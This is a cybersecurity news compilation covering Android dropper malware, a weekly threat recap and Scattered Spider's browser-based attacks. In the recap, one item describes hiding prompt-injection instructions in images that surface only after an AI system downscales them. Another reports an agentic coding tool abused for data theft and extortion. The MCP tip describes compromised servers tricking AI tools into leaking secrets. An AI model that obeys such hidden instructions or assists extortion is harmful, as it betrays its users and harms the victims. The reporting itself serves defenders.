2025-09-02 AI创业新闻

Android Droppers Now Deliver SMS Stealers and Spyware, Not Just Banking Trojans

Cybersecurity researchers are calling attention to a new shift in the Android malware landscape where dropper apps, which are typically used to deliver banking trojans, to also distribute simpler malware such as SMS stealers and basic spyware. These campaigns are propagated via dropper apps masquerading as government or banking apps in India and other parts of Asia, ThreatFabric said in a report last week. The Dutch mobile security firm said the change is driven by recent security protections that Google has piloted in select markets like Singapore, Thailand, Brazil, and India to block sideloading of potentially suspicious apps requesting dangerous permissions like SMS messages and accessibility services , a heavily abused setting to carry out malicious actions on Android devices. “Google Play Protect’s defences, particularly the targeted Pilot Program, are increasingly effective at stopping risky apps before they run,” the company said.

“Second, actors want to future-proof their operations.” “By encapsulating even basic payloads inside a dropper, they gain a protective shell that can evade today’s checks while staying flexible enough to swap payloads and pivot campaigns tomorrow.” ThreatFabric said that while Google’s strategy ups the ante by blocking a malicious app from being installed even before a user can interact with it, attackers are trying out new ways to get around the safeguards – an indication of the endless game of whack-a-mole when it comes to security. This includes designing droppers, keeping in mind Google’s Pilot Program, so that they don’t seek high-risk permissions and serve only a harmless “update” screen that can fly past scanning in the regions. But it’s only when the user clicks the “Update” button that the actual payload gets fetched from an external server or unpacked, which then proceeds to seek the necessary permissions to fulfil its objectives. “Play Protect may display alerts about the risks, as a part of a different scan, but as long as the user accepts them, the app is installed, and the payload is delivered,” ThreatFabric said.

“This illustrates a critical gap: Play Protect still allows risky apps through if the user clicks Install anyway, and the malware still slips through the Pilot Program.” One such dropper is RewardDropMiner, which has been found to serve along with spyware payloads a Monero cryptocurrency miner that can be activated remotely. Recent variants of the tool, however, no longer include the miner functionality. Some of the malicious apps delivered via RewardDropMiner, all targeting users in India, are listed below - PM YOJANA 2025 (com.fluvdp.hrzmkgi) °RTO Challan (com.epr.fnroyex) SBI Online (com.qmwownic.eqmff) Axis Card (com.tolqppj.yqmrlytfzrxa) Other dropper variants that avoid triggering Play Protect or the Pilot Program include SecuriDropper, Zombinder, BrokewellDropper, HiddenCatDropper, and TiramisuDropper. When reached for comment, Google told The Hacker News it has not found any apps using these techniques distributed via the Play Store and that it’s constantly adding new protections.

“Regardless of where an app comes from – even if it’s installed by a ‘dropper’ app – Google Play Protect helps to keep users safe by automatically checking it for threats,” a spokesperson said. “Protection against these identified malware versions was already in place through Google Play Protect prior to this report. Based on our current detection, no apps containing these versions of this malware have been found on Google Play. We’re constantly enhancing our protections to help keep users safe from bad actors.” The development comes as Bitdefender Labs has warned of a new campaign that’s using malicious ads on Facebook to peddle a free premium version of the TradingView app for Android to ultimately deploy an improved version of the Brokewell banking trojan to monitor, control, and steal sensitive information from the victim’s device.

No less than 75 malicious ads have been run since July 22, 2025, reaching tens of thousands of users in the European Union alone. The Android attack wave is just one part of a larger malvertising operation that has abused Facebook Ads to also target Windows desktops under the guise of various financial and cryptocurrency apps. “This campaign shows how cybercriminals are fine-tuning their tactics to keep up with user behavior,” the Romanian cybersecurity company said . “By targeting mobile users and disguising malware as trusted trading tools, attackers hope to cash in on the growing reliance on crypto apps and financial platforms.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

⚡ Weekly Recap: WhatsApp 0-Day, Docker Bug, Salesforce Breach, Fake CAPTCHAs, Spyware App & More

Cybersecurity today is less about single attacks and more about chains of small weaknesses that connect into big risks. One overlooked update, one misused account, or one hidden tool in the wrong hands can be enough to open the door. The news this week shows how attackers are mixing methods—combining stolen access, unpatched software, and clever tricks to move from small entry points to large consequences. For defenders, the lesson is clear: the real danger often comes not from one major flaw, but from how different small flaws interact together.

⚡ Threat of the Week WhatsApp Patches Actively Exploited Flaw — WhatsApp addressed a security vulnerability in its messaging apps for Apple iOS and macOS that it said may have been exploited in the wild in conjunction with a recently disclosed Apple flaw in targeted zero-day attacks. The vulnerability, CVE-2025-55177 relates to a case of insufficient authorization of linked device synchronization messages. The Meta-owned company said the issue “could have allowed an unrelated user to trigger processing of content from an arbitrary URL on a target’s device.” It also assessed that the shortcoming may have been chained with CVE-2025-43300, a vulnerability affecting iOS, iPadOS, and macOS, as part of a sophisticated attack against specific targeted users. WhatsApp said it sent in-app threat notifications to less than 200 users who may have been targeted as part of the spyware campaign.

Level Up Your Auth for Not Only Your Users, But Also Your AI Agents Auth0 provides robust security and gives you control over the user experience, from sign-up flows to advanced authorization. Learn More ➝ 🔔 Top News U.S. Treasury Continues to Hit IT Worker Scheme with Sanctions — The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned a fraudulent IT worker network linked to the Democratic People’s Republic of Korea (DPRK).

This included Vitaliy Sergeyevich Andreyev, a Russian national who facilitated payments to Chinyong Information Technology Cooperation Company (Chinyong), also known as Jinyong IT Cooperation Company, which was sanctioned by OFAC and South Korea’s Ministry of Foreign Affairs (MOFA) in May 2023. Also included in the designation were Kim Ung Sun, Shenyang Geumpungri Network Technology Co., Ltd., and Korea Sinjin Trading Corporation. These actors were designated for their involvement in schemes that funnel DPRK IT worker-derived revenue to support DPRK weapons of mass destruction and ballistic missile programs. The cryptocurrency wallet linked to Andreyev has “received over $600,000 of payments and has source exposure back to the Atomic Wallet exploit of June 2023,” which was attributed to the Lazarus Group, per Elliptic .

The designation builds upon other actions OFAC has taken to disrupt the DPRK’s IT worker schemes. Critical Docker Flaw Patched — Users of Docker Desktop on Windows and Mac are urged to upgrade to the latest version to patch a critical vulnerability that could allow an attacker to break the container isolation layer and potentially take over the host system. The vulnerability (CVE-2025-9074) stems from the fact that Docker Desktop exposes the Docker Engine API, which can be used to control Docker containers over a TCP socket without any authentication. As a result of this flaw, an attacker who gains access to a Docker container could leverage the API to create a new Docker container and mount the operating system’s file system, gaining access to sensitive information or overwriting system-critical files, resulting in arbitrary code execution.

However, mounting the file system administrator works only on Windows, as attempting this process on macOS would prompt the user for permission. Also, on macOS, Docker doesn’t run with administrator privileges like it does on Windows. Critical Sectors Targeted by MixShell — Cybercriminals have targeted dozens of critical U.S. manufacturers and supply-chain companies, looking to steal sensitive data and deploy ransomware.

The activity, dubbed ZipLine, dates back to the beginning of May 2025. Instead of emailing a malicious link in an unsolicited email, the miscreants initiate contact through the organization’s public “Contact Us” form under the guise of partnership inquiries or other business pretexts, tricking the victim into starting the conversation and allowing the attackers to bypass email filters. The attacks led to the deployment of a stealthy implant called MixShell. By using website contact forms, the attack flips the phishing playbook by getting victims to make the first email contact with the attacker rather than the other way around.

Salesforce Instances Targeted via Salesloft Drift — A threat activity cluster has committed a spate of data breaches of organizations’ Salesforce instances by compromising OAuth tokens associated with the Salesloft Drift third-party application. UNC6395 has been carrying out a “widespread data theft” campaign by targeting Salesforce instances beginning as early as August 8 through at least August 18. UNC6395 “systematically exported large volumes of data from numerous corporate Salesforce instances” for the purpose of harvesting sensitive credentials, such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens. Once these credentials were exfiltrated, “the actor then searched through the data to look for secrets that could be potentially used to compromise victim environments,” and then covered its tracks by deleting query jobs.

Storm-0501 Linked to Cloud Extortion Attacks — Storm-0501 has sharpened its ransomware tactics by exploiting hijacked privileged accounts to move seamlessly between on-premises and cloud environments, exploiting visibility gaps to encrypt data and exfiltrate sensitive data, and carry out mass deletions of cloud resources, including backups. The threat actor checked for the presence of security software, suggesting a deliberate effort to avoid detection by targeting non-onboarded systems. The attackers also conducted reconnaissance activities to gain deep visibility into the organization’s security tooling and infrastructure. This evolution signals a technical shift and a change in impact strategy.

Instead of just encrypting files and demanding ransom for decryption, Storm-0501 exfiltrates sensitive cloud data, destroys backups, and then extorts victims by threatening permanent data loss or exposure. UNC6384 Deploys PlugX via Captive Portal Hijack — Chinese state hackers have been hijacking captive portal checks to deliver malware couched as Adobe software. The activity, attributed to Mustang Panda, appears to have targeted Southeast Asian diplomats in particular, and other unidentified entities around the globe, between approximately March and July of this year. Around two dozen victims were likely compromised, although it’s possible there were more.

The trick to Mustang Panda’s latest campaign involves hijacking captive portal checks to redirect users to a website under their control to distribute malware. It’s believed that the hackers infected edge devices in the targets’ networks, which they used to intercept the check made by the Google Chrome browser. Users who fell for the scheme ended up downloading an ostensibly innocuous binary that ultimately led to the deployment of PlugX. ShadowCapatcha Leverages ClickFix to Deliver Malware — A financially motivated campaign dubbed ShadowCaptcha is leveraging fake Google and Cloudflare CAPTCHA pages to trick victims into executing malicious commands using compromised WordPress sites as an infection vector.

The attacks lead to the deployment of information stealers and ransomware, demonstrating a versatile monetization approach. The activity primarily focuses on three revenue streams: Data theft and subsequent sale, drop cryptocurrency miners, and infect machines with ransomware. This multi-pronged strategy ensures a sustained revenue generation mechanism, maximising their return on investment while also maintaining persistent access. 🔥 Trending CVEs Hackers act fast.

They attack soon after a weakness is found. One missed update, a hidden error, or a forgotten security alert can let them in. A small problem can quickly turn into big trouble like stolen data or system crashes, before you even notice. Here are this week’s serious risks.

Check them, fix them fast, and stay safe before attackers do. This week’s list includes — CVE-2025-55177 (WhatsApp), CVE-2025-34509, CVE-2025-34510, CVE-2025-34511 (Sitecore Experience Platform), CVE-2025-57819 (FreePBX), CVE-2025-26496 (Tableau Server), CVE-2025-54939 (LSQUIC QUIC), CVE-2025-9118 (Google Cloud Dataform API), CVE-2025-53118 (Securden Unified PAM), CVE-2025-9478 (Google Chrome), CVE-2025-50975 (IPFire 2.29), CVE-2025-23307 (NVIDIA NeMo Curator), CVE-2025-20241 (Cisco Nexus 3000 and 9000 Series switches), CVE-2025-20317 (Cisco Integrated Management Controller), CVE-2025-20294, CVE-2025-20295 (Cisco Unified Computing System Manager), CVE-2025-54370 (PhpSpreadsheet), CVE-2025-39245, CVE-2025-39246, CVE-2025-39247 (Hikvision HikCentral), CVE-2025-49146, CVE-2025-48976, CVE-2025-53506, CVE-2025-52520 (Atlassian), CVE-2025-50979 (NodeBB), and CVE-2025-8067 (Linux UDisks daemon). 📰 Around the Cyber World Microsoft RDP services Targeted by Malicious Scans — Microsoft’s Remote Desktop Protocol (RDP) services have been hit with a torrent of malicious scans from tens of thousands of IP addresses in recent days, indicating a coordinated reconnaissance campaign. “The wave’s aim was clear: test for timing flaws that reveal valid usernames, laying the groundwork for credential-based intrusions,” GreyNoise said .

The activity took place over two waves on August 21 and 24, with thousands of unique IP addresses simultaneously probing both Microsoft RD Web Access and Microsoft RDP Web Client authentication portals. Flaw in TheTruthSpy Spyware — A vulnerability in TheTruthSpy spyware app can allow bad actors to take over any account and retrieve collected victim data. The vulnerability exploits an issue with the app’s password recovery process to change the password of any account. TheTruthSpy told TechCrunch it can’t fix the bug because it “lost” the app’s source code.

Russia’s Max App Logs User Activity — The Russian government’s WhatsApp rival, Max, is constantly monitoring and logging all user activity. According to Corellium’s technical analysis , the app doesn’t use encryption and tracks user location in real-time and with high accuracy. Developed by Russian tech giant VK, the app has been made mandatory and must be installed on all mobile devices sold in Russia after September 1, 2025. The app was initially launched earlier this March.

OpenSSH’s PQC Play — OpenSSH said it will start showing warnings when users connect to an SSH server that does not have post-quantum cryptography protections starting with OpenSSH 10.1. “The ideal solution is to update the server to use an SSH implementation that supports at least one of these,” the maintainers said. “OpenSSH versions 9.0 and greater support sntrup761x25519-sha512 and versions 9.9 and greater support mlkem768x25519-sha256. If your server is already running one of these versions, then check whether the KexAlgorithms option has disabled their use.” Credential Harvesting Campaign Targets ScreenConnect Super Admin Accounts — A low-volume campaign is targeting ScreenConnect cloud administrators with fake email alerts warning about a potentially suspicious login event with the goal of stealing their credentials for potential ransomware deployment.

The activity, ongoing since 2022, has been attributed by Mimecast to MCTO3030. “The campaign employs spear phishing emails delivered through Amazon Simple Email Service (SES) accounts, targeting senior IT professionals, including directors, managers, and security personnel with elevated privileges in ScreenConnect environments,” the company said . “The attackers specifically seek super administrator credentials, which provide comprehensive control over remote access infrastructure across entire organizations.” The attackers are using the open source Evilginx framework to provision these phishing pages and to act as a reverse proxy between the victim and the real site. The framework can capture both login credentials and session cookies.

More ScreenConnect-Themed Campaigns Discovered — Another campaign has leveraged phishing emails with fake Zoom meeting invitations and Microsoft Teams calls to lead victims to malicious links that download the ScreenConnect software. “The weaponization of a legitimate IT administration tool – one designed to grant IT professionals deep system access for troubleshooting and maintenance – combined with social engineering and convincing business impersonation creates a multi-layered deception that provides attackers with the dual advantage of trust exploitation and security evasion,” Abnormal AI said . The campaign has so far targeted more than 900 organizations, impacting a broad range of sectors and geographies. A separate campaign has also been observed using fake AI-themed content to lure users into executing a malicious, pre-configured ScreenConnect installer, which then acts as an entry point for the XWorm malware, per Trustwave .

In a related development, attackers have been observed weaponizing Cisco’s secure links (“secure-web.cisco[.]com”) in credential phishing campaigns to evade link scanning and by-pass network filters. “Attackers compromise or create accounts within Cisco-protected organizations,” Raven AI said . “They simply email themselves malicious links, let Cisco’s system rewrite them into Safe Links, then harvest these URLs for their campaigns.” A similar campaign exploiting Proofpoint links was disclosed by Cloudflare in July 2025. TRM Labs Warns of Scam Campaign Impersonating the Firm — Blockchain intelligence company said it’s aware of individuals using false domains to impersonate TRM Labs and/or government agencies working in collaboration with TRM Labs.

“These are not TRM Labs domains, and the actors behind these are scammers,” the company said . “TRM Labs is not involved in fund recovery processes for victims and does not partner with government agencies for the purposes of fund recovery. Unfortunately, these types of scams deliberately target vulnerable people, often when they’re financially vulnerable, having potentially already lost funds to scams.” The warning comes against the backdrop of an alert issued by the U.S. Federal Bureau of Investigation (FBI), urging cryptocurrency scam victims to be on the lookout for scams where fraudsters pose as lawyers representing fictitious law firms to help them assist with fund recovery, only to deceive them a second time.

New Ransomware Strains Detected — A new ransomware strain going by the name of Cephalus has been spotted in the wild. In incidents observed around mid-August 2025, the group behind the locker used compromised RDP accounts for initial access and used the cloud storage service MEGA for likely data exfiltration purposes. The development comes as the Underground and NightSpire ransomware gangs have launched ransomware attacks against companies in various countries and industries, including South Korea. In another attack analyzed by eSentire, compromised third-party MSP SonicWall SSL VPN credentials served as an initial access pathway for Sinobi, a rebrand of the Lynx ransomware.

“Using the compromised account, the threat actors executed commands to create a new local administrator account, set its password, and add it to the domain administrators group,” eSentire said . “Both the initial compromised account and the newly created account were subsequently used for lateral movement throughout the network.” Most Active Ransomware Groups — Akira, Cl0p, Qilin, Safepay, and RansomHub were the most active ransomware groups in the first half of 2025, per Flashpoint , which found that ransomware attacks increased by 179% compared to the 2024 midyear. The development comes amid notable changes in the ransomware ecosystem, where threat actors increasingly prefer extortion over encryption and have begun to incorporate LLMs in their tooling. The landscape has also continued to splinter, with new gangs and rebrands proliferating in the wake of law enforcement takedowns.

MalwareBytes said it tracked 41 newcomers between July 2024 and June 2025, with more than 60 total ransomware gangs operating at once. Microsoft to Throttle Emails to Combat Spam — Microsoft said it will begin throttling emails starting October 15, 2025. The limit will be set to 100 external recipients per organization per 24-hour rolling window. From December 1, the tech giant will start rolling out the restrictions across tenants, starting with tenants with fewer than three seats and eventually reaching tenants with more than 10,001 seats by June 2026.

“Despite our efforts to minimize abuse, spammers often exploit newly created tenants to send bursts of spam from ‘.onmicrosoft.com’ addresses before we can intervene,” Microsoft said . “This degrades this shared domain’s reputation, affecting all legitimate users. To ensure brand trust and email deliverability, organizations should establish and use their own custom domains for sending email.” SleepWalk, a Physical Side-Channel Attack to Leak Data — A group of academics from the University of Florida has devised a new hardware side-channel attack dubbed SleepWalk that exploits context switching and CPU power consumption to leak sensitive data like cryptographic keys. “We introduce a physical power side-channel leakage source that exploits the power spike observed during a context switch, triggered by the inbuilt sleep function of the system kernel,” the researchers said .

“We observed that this power spike directly correlates with both the power consumption during context switching and the residual power consumption of the previously executed program. Notably, the persistence of residual power signatures from previous workloads extends the scope of this side-channel beyond extracting the data in registers during the context switch. Unlike traditional approaches that require analyzing full power traces, applying complex preprocessing, or relying on external synchronization triggers, this novel technique leverages only the amplitude of a single power spike, significantly simplifying the attack.” AI Systems Vulnerable to Prompt Injection via Image Scaling Attack — In a novel form of prompt injection attacks aimed at artificial intelligence (AI) chatbots, attackers can hide malicious instructions inside large-scale images and have the prompts execute when the AI agent downscales them. The attacker’s prompt is invisible to the human eye in the high-resolution image, but shows up when the image is downscaled by preprocessing algorithms.

“This attack works because AI systems often scale down large images before sending them to the model: when scaled, these images can reveal prompt injections that are not visible at full resolution,” Trail of Bits said . The cybersecurity company has released an open-source tool called Anamorpher to generate such crafted images. Social Media Accounts Launder News from Chinese State Media Sites — A network of 11 domains and 16 companion social media accounts across Facebook, Instagram, Mastodon, Threads, and X has been found laundering exclusively English-language articles originally published by the Chinese state media outlet CGTN. “The assets almost certainly used AI tools to translate and summarize articles from CGTN, likely in an attempt to disguise the content’s origin,” Graphika said .

“The network assets disseminated primarily pro-China, anti-West content in English, French, Spanish, and Vietnamese.” The findings came as the U.S. told Denmark to “calm down” over allegations of covert influence operations by U.S. citizens in Greenland to sow discord between Denmark and Greenland and to promote Greenland’s secession from Denmark to the U.S. Analyzing Secret Families of VPN Apps — New research conducted by the Arizona State University and Citizen Lab has found that nearly two dozen VPN applications in Google Play contain security weaknesses impacting the privacy of their users, exposing transmitted data to decryption risks.

Further analysis has determined that eight VPN applications from Innovative Connecting, Autumn Breeze, and Lemon Clove (Turbo VPN, Turbo VPN Lite, VPN Monster, VPN Proxy Master, VPN Proxy Master – Lite, Snap VPN, Robot VPN, and SuperNet VPN) share code, dependencies, outdated and unsafe encryption methods, and hard-coded passwords, potentially allowing attackers to decrypt the traffic of their users. Cumulatively, these apps have over 380 million downloads on Google Play. All three companies were found to have ties with Qihoo 360, a Chinese cybersecurity firm that the U.S. sanctioned in 2020.

Security Risks in the eSIM Ecosystem — A new study undertaken by academics from Northeastern University has found that many providers associated with eSIMs route user data through foreign telecommunications networks, including Chinese infrastructure, regardless of user location. “Many travel eSIMs route user traffic through third-party infrastructure, often located in foreign jurisdictions,” the researchers said . “This may expose user metadata and content to networks outside the user’s country, raising concerns about jurisdictional control and surveillance.” What’s more, the digital provisioning model creates new opportunities for phishing and spoofing. Malicious actors can distribute fake eSIM profiles via fraudulent QR codes or websites, tricking users into installing unauthorized configurations.

ComfyUI Flaw Exploited to Deliver Pickai Backdoor — Threat actors have exploited vulnerabilities in an artificial intelligence (AI) platform called ComfyUI to deliver a backdoor called Pickai. “Pickai is a lightweight backdoor written in C++, designed to support remote command execution and reverse shell access,” XLab said , adding that it “includes anti-debugging, process name spoofing, and multiple persistence mechanisms.” Pickai samples have been observed hosted on the official site of Rubick.ai, a commercial AI-powered platform serving the e-commerce sector across the U.S., India, Singapore, and the Middle East. Early versions of the malware were uploaded to VirusTotal as far back as February 28, 2025. The activity has compromised nearly 700 infected servers worldwide, mainly in Germany, the U.S., and China.

Flaw in LSQUIC QUIC Disclosed — Cybersecurity researchers have discovered a vulnerability dubbed QUIC-LEAK (CVE-2025-54939) in the LSQUIC QUIC implementation, allowing threat actors to smuggle malformed packets to exhaust memory and crash QUIC servers even before a connection handshake is established, thereby bypassing QUIC connection-level safeguards. The issue has been fixed in OpenLiteSpeed 1.8.4 and LiteSpeed Web Server 6.3.4. Fake Sites Pushing YouTube Downloads Serve Proxyware — Proxyware programs are being distributed through YouTube sites that allow users to download videos. Attackers who previously installed DigitalPulse and HoneyGain Proxywares are also installing Infatica Proxyware.

Similar to coin miners, Proxyware malware profits by utilizing the system’s resources, and many systems in South Korea have recently become the targets of these attacks. U.S. Senator Castigates Federal Judiciary for Negligence — U.S. Senator Ron Wyden accused the federal judiciary of “negligence and incompetence” following a recent hack , reportedly by hackers with ties to the Russian government, that exposed confidential court documents.

The breach of the judiciary’s electronic case filing system first came to light in a report by Politico three weeks ago, which went on to say that the vulnerabilities exploited in the hack were known since 2020. The New York Times, citing people familiar with the intrusion, said that Russia was “at least partly responsible” for the hack. “The federal judiciary’s current approach to information technology is a severe threat to our national security,” Wyden wrote. “The courts have been entrusted with some of our nation’s most confidential and sensitive information, including national security documents that could reveal sources and methods to our adversaries, and sealed criminal charging and investigative documents that could enable suspects to flee from justice or target witnesses.” Law Enforcement Freezes $50M in Crypto Assets Tied to Romance Baiting Scams — Several cryptocurrency companies, including Chainalysis, OKX, Binance, and Tether, have come together to freeze nearly $50 million stolen via “romance baiting” scams in collaboration with APAC-based authorities.

“Once funds were transferred, scammers then sent proceeds to a consolidation wallet which transferred $46.9 million in USDT [Tether] to a collection of three intermediary addresses,” Chainalysis said . “The funds then moved to five different wallets.” The funds were frozen by Tether in July 2024. South Korea Extradites Chinese National for Cyber Attacks — South Korean authorities have successfully extradited a 34-year-old Chinese national suspected of orchestrating one of the most sophisticated hacking operations targeting high-profile individuals and financial institutions. He is alleged to have stolen 38 billion won from financial accounts and virtual asset accounts.

Anthropic and OpenAI Test Each Other’s AI — OpenAI has called on AI firms to test their rivals’ systems for safety, as the company and Anthropic conducted safety evaluations of each other’s AI systems to tackle risks like prompt injection and model poisoning. The development came as Anthropic revealed that a cybercriminal abused its agentic AI coding tool to automate a large-scale data theft and extortion campaign, marking a “new evolution” in how AI is super-charging cybercrime. The chatbot then analyzed the companies’ hacked financial documents to help arrive at a realistic amount of bitcoin to demand in exchange for not leaking the stolen material. It also wrote suggested extortion emails.

“The operation demonstrates a concerning evolution in AI-assisted cybercrime, where AI serves as both a technical consultant and active operator, enabling attacks that would be more difficult and time-consuming for individual actors to execute manually.” Where years of specialized training once throttled the ability of bad actors to pull off attacks at scale, the new wave of AI-assisted cybercrime could further lower technical barriers, allowing even novices and unskilled operators to carry out complex activities with ease. Separately, Anthropic has announced a policy change to train its AI chatbot Claude with user data, giving existing users until September 28, 2025, to either opt in or opt out to continue using the service; it says it will enable the company to deliver “even more capable, useful AI models” and strengthen safeguards against harmful usage like scams and abuse. Plex Servers Susceptible to New Flaw — Plex has addressed a security vulnerability (CVE-2025-34158), stemming from incorrect resource transfer between spheres, affecting Plex Media Server versions 1.41.7.x to 1.42.0.x. It has been patched in versions 1.42.1.10060 or later.

According to data from Censys, there are 428,083 devices exposing the Plex Media Server web interface, although not all of them are necessarily vulnerable. Fake Recipe and Guide Sites Drop Malware — Bogus sites masquerading as image, recipe, and educational guide finders have been found to harbor stealthy code to issue stealthy commands and drop malware on users’ systems that can steal sensitive information. It’s assessed that these sites reach targets via malvertising campaigns. 🎥 Cybersecurity Webinars What Every AppSec Leader Must Learn About Code-to-Cloud Security

• Modern AppSec is no longer just about spotting risks—it’s about learning how they emerge and spread from code to cloud.

Without visibility across that journey, teams face blind spots, noise, and delayed fixes. Code-to-cloud context changes the game, giving security and engineering teams the clarity to learn faster, act sooner, and protect what matters most. Practical Steps to Keep AI Agents Safe from Cyberattacks

• AI agents are rapidly reshaping business—automating decisions, streamlining operations, and unlocking new opportunities. But with innovation comes risk.

Join our upcoming webinar with Auth0’s Michelle Agroskin to uncover the security challenges AI agents introduce and learn actionable strategies to protect your organization. Discover how to stay ahead of threats while confidently embracing the future of AI-driven innovation. From Fingerprints to Code Traces: How Experts Hunt Down Shadow AI

• AI Agents are multiplying in your workflows, clouds, and business processes—often without approval. These “shadow agents” move faster than governance, fueled by hidden identities and one-click deployments.

The result? Security teams are left chasing ghosts. Join our expert panel to uncover where shadow AI hides, who’s behind it, and how to take back control—without slowing down innovation. 🔧 Cybersecurity Tools PcapXray

• Investigating packet captures can be slow and messy.

PcapXray speeds up the process by turning raw PCAP files into clear, visual network diagrams. It highlights hosts, traffic flows, Tor usage, and potential malicious activity—helping investigators and analysts quickly see what’s happening inside the data without digging line by line. Kopia

• It is an open-source backup and restore tool that creates encrypted snapshots of selected files and directories. Instead of imaging an entire machine, it lets you back up what matters most—whether to local storage, network drives, or cloud providers like S3, Azure, or Google Cloud.

With built-in deduplication, compression, and end-to-end encryption, Kopia helps ensure backups are efficient, secure, and under your full control. Disclaimer: These newly released tools are for educational use only and haven’t been fully audited. Use at your own risk—review the code, test safely, and apply proper safeguards. 🔒 Tip of the Week How to Lock Down Your MCP Servers — AI tools like GitHub Copilot are getting smarter every day.

With the Model Context Protocol (MCP), they can connect to outside tools and services—running code, pulling data, or even talking to internal systems. That’s powerful, but it’s also risky: if a bad actor sneaks in with a fake or compromised MCP server, your AI could be tricked into leaking secrets, exposing credentials, or executing harmful commands. The solution isn’t to avoid MCP. It’s to secure it properly.

Here’s a practical way to do that using free tools. 1. Test Before You Trust: Before turning on any MCP server, run an audit. Tool to try: MCPSafetyScanner What it does: Scans MCP definitions, runs test attacks, and reports if something looks unsafe.

1. Wrap Servers with a Safety Net: Don’t expose servers directly. Add a guard layer. Tool to try: MCP Guardian (open-source prototype from research).

What it does: Adds authentication, logs all activity, and blocks suspicious requests. 3. Stress-Test Like an Attacker: Simulate real-world threats to see how your setup holds up. Tool to try: MCPSecBench What it does: Launches different known MCP attack patterns and measures resilience.

1. Enforce Rules as Code: Add guardrails for what AI can and can’t do. Tools to try: Open Policy Agent (OPA) or Kyverno What they do: Define policies (e.g., “only read from X API, never write”) and enforce them automatically. 5.

Go Zero-Trust on Access: Every connection should be verified and limited. Use OAuth 2.1 for authorization. Add mTLS (mutual TLS) so both client and server prove who they are. Send all logs to your SIEM (e.g., Elastic or Grafana Loki) for monitoring.

AI + MCP is moving fast. The line between “helpful automation” and “security hole” is thin. By auditing, stress-testing, enforcing rules, and monitoring, you’re not just protecting against today’s risks—you’re preparing for tomorrow’s. Think of it like this: MCP gives your AI superpowers.

Your job is to make sure those powers don’t get hijacked. Conclusion Quantum-safe encryption, AI-driven phishing, identity without passwords—these are not distant theories anymore. They are already shaping the security landscape quietly, underneath the day-to-day headlines. The closing lesson: the biggest shocks often arrive not as breaking news, but as trends that grow slowly until suddenly they cannot be ignored.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

When Browsers Become the Attack Surface: Rethinking Security for Scattered Spider

As enterprises continue to shift their operations to the browser, security teams face a growing set of cyber challenges. In fact, over 80% of security incidents now originate from web applications accessed via Chrome, Edge, Firefox, and other browsers. One particularly fast-evolving adversary, Scattered Spider, has made it their mission to wreak havoc on enterprises by specifically targeting sensitive data on these browsers. Scattered Spider, also referred to as UNC3944, Octo Tempest, or Muddled Libra, has matured over the past two years through precision targeting of human identity and browser environments.

This shift differentiates them from other notorious cybergangs like Lazarus Group, Fancy Bear, and REvil. If sensitive information such as your calendar, credentials, or security tokens is alive and well in browser tabs, Scattered Spider is able to acquire them. In this article, you’ll learn details about Scattered Spider’s attack methods and how you can stop them in their tracks. Overall, this is a wake-up call to CISOs everywhere to elevate the organization’s browser security from an ancillary control to a central pillar of their defense.

Scattered Spider’s Browser-Focused Attack Chain

Scattered Spider avoids high-volume phishing in favor of precision exploitation. This is done by leveraging users’ trust in their most used daily application, stealing saved credentials, and manipulating browser runtime. Browser Tricks

Techniques like Browser-in-the-Browser (BitB) overlays and auto-fill extraction are used to steal credentials while evading detection by traditional security tools like Endpoint Detection and Response (EDR). Session Token Theft

Scattered Spider and other attackers will bypass Multi-Factor Authentication (MFA) to capture tokens and personal cookies from the browser’s memory.

Malicious Extensions & JavaScript Injection

Malicious payloads get delivered through fake extensions and execute in-browser via drive-by techniques and other advanced methods. Browser-Based Reconnaissance

Web APIs and the probing of installed extensions allow these attackers to gain access map critical internal systems. For a full technical breakdown of these tactics, see Scattered Spider Inside the Browser: Tracing Threads of Compromise. Strategic Browser-Layer Security: A Blueprint for CISOs To counteract Scattered Spider and other advanced browser threats, CISOs must utilize a multi-layered browser security strategy across the following domains.

1. Stop Credential Theft with Runtime Script Protection Phishing attacks have been around for decades. Attackers like Scattered Spider, however, have advanced their techniques tenfold in recent years. These advanced phishing campaigns are now relying on malicious JavaScript executions that are executed directly inside the browser, bypassing security tools like EDR.

This is done to steal user credentials and other sensitive data. In order to successfully block phishing overlays and intercept dangerous patterns that steal credentials, organizations must implement JavaScript runtime protection to analyze behavior. By applying such protection, security leaders can stop attackers from gaining access and stealing credentials before it’s too late. 2.

Prevent Account Takeovers by Protecting Sessions Once user credentials get into the wrong hands, attackers like Scattered Spider will move quickly to hijack previously authenticated sessions by stealing cookies and tokens. Securing the integrity of browser sessions can best be achieved by restricting unauthorized scripts from gaining access or exfiltrating these sensitive artifacts. Organizations must enforce contextual security policies based on components such as device posture, identity verification, and network trust. By linking session tokens to context, enterprises can prevent attacks like account takeovers, even after credentials have become compromised.

1. Enforce Extension Governance and Block Rogue Scripts Browser extensions have become extremely popular in recent years, with Google Chrome featuring 130,000+ for download on the Chrome Web Store. While they can serve as productivity boosters, they have also become attack vectors. Malicious or poorly vetted extensions can request invasive permissions, inject malicious scripts into the browser, or act as the delivery system for attack payloads.

Enterprises must enforce robust extension governance to allow pre-approved extensions with validated permissions. Equally important is the need to block untrusted scripts before they execute. This approach ensures that legitimate extensions remain available, so the user’s workflow is not disrupted. 4.

Disrupt Reconnaissance Without Breaking Legitimate Workflows Attackers like Scattered Spider will often begin attacks through in-browser reconnaissance. They do this by using APIs such as WebRTC, CORS, or fingerprinting to map the environment. This allows them to identify frequently used applications or track specific user behavior. To stop this reconnaissance, organizations must disable or replace sensitive APIs with decoys that deliver incorrect information to the attacking group.

However, adaptive policies are needed to avoid the breaking of legitimate workflows, which are particularly important in BYOD and unmanaged devices. 5. Integrate Browser Telemetry into Actionable Security Intelligence Although browser security is the last mile of defense for malware-less attacks, integrating it into an existing security stack will fortify the entire network. By implementing activity logs enriched with browser data into SIEM, SOAR, and ITDR platforms, CISOs can correlate browser events with endpoint activity for a much fuller picture.

